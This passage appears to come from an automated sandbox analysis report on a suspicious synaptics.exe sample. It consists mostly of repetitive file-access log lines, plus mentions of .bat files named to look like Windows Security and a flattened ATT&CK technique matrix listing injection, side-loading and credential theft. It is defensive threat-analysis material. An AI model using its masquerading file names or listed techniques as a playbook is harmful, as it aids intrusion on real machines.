Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\reprlib.cpython-310.pyc.36507232 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\copyreg.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\copyreg.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\copyreg.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\copyreg.cpython-310.pyc.36506464 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\traceback.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\traceback.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\traceback.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\traceback.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\traceback.cpython-310.pyc.39936032 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\linecache.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\linecache.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\linecache.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\linecache.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\linecache.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\linecache.cpython-310.pyc.39937088 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\tokenize.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\tokenize.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\tokenize.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\tokenize.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\tokenize.cpython-310.pyc.39937184 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\token.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\token.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\token.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\token.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\token.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\token.cpython-310.pyc.39966816 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\weakref.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\weakref.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\weakref.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\weakref.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\weakref.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\weakref.cpython-310.pyc.39937664 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_weakrefset.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_weakrefset.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_weakrefset.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_weakrefset.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\_weakrefset.cpython-310.pyc.39938432 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\collections\__pycache__\abc.cpython-310.pyc.40047456 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\string.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\string.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\string.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\string.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\string.cpython-310.pyc.39938432 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\threading.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\threading.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\threading.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\threading.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\threading.cpython-310.pyc.39939008 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\typing.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\typing.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\typing.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\typing.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\typing.cpython-310.pyc.39939392 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\contextlib.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\contextlib.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\contextlib.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\contextlib.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\contextlib.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\contextlib.cpython-310.pyc.39939488 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3\exceptions.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3\exceptions.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3\exceptions.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3\exceptions.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3\exceptions.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site-packages\urllib3\__pycache__\exceptions.cpython-310.pyc.39740144 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\socket.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\socket.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\socket.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\socket.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\socket.cpython-310.pyc.40556544 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\selectors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\selectors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\selectors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\selectors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\selectors.cpython-310.pyc.40556832 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs\select.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__pycache__\__init__.cpython-310.pyc.36424680 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\errors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\errors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\errors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\errors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\errors.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__pycache__\errors.cpython-310.pyc.40557504 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\__pycache__\__init__.cpython-310.pyc.40557984 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\client.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\client.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\client.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\client.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\client.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\http\__pycache__\client.cpython-310.pyc.40558368 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\parser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\parser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\parser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\parser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\parser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__pycache__\parser.cpython-310.pyc.40575200 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\feedparser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\feedparser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\feedparser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\feedparser.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\__pycache__\feedparser.cpython-310.pyc.40530784 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\_policybase.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\_policybase.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\email\_policybase.py VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\tmp\New Text Document.bat VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\Public\Windows Security.bat VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\Public\Windows Security VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Rundll32
LSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
